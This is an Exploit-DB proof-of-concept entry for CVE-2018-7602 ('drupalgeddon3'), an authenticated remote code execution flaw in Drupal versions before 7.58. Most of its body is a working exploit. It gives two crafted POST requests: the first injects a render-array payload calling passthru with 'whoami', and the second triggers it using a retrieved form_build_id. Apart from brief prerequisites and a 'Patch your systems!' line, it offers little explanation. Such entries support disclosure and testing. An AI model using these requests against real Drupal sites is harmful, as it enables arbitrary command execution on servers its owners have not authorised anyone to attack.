Drupal < 7.58 - 'drupalgeddon3' Authenticated Remote Code Execution (PoC)

EDB-ID: 44542
Author: Blaklis
Published: 2018-04-25
CVE: CVE-2018-7602
Type: Webapps
Platform: PHP
Aliases: drupalgeddon3
Advisory/Source: Link
Tags: N/A
Vulnerable App: N/A

You must be authenticated and with the power of deleting a node. Some other forms may be vulnerable : at least, all of forms that is in 2-step (form then confirm).

POST /?q=node/99/delete&destination=node?q[%2523][]=passthru%26q[%2523type]=markup%26q[%2523markup]=whoami HTTP/1.1

Retrieve the form_build_id from the response, and then triggering the exploit with :

POST /drupal/?q=file/ajax/actions/cancel/%23options/path/[FORM_BUILD_ID] HTTP/1.1

This will display the result of the whoami command.

Patch your systems!

Related Posts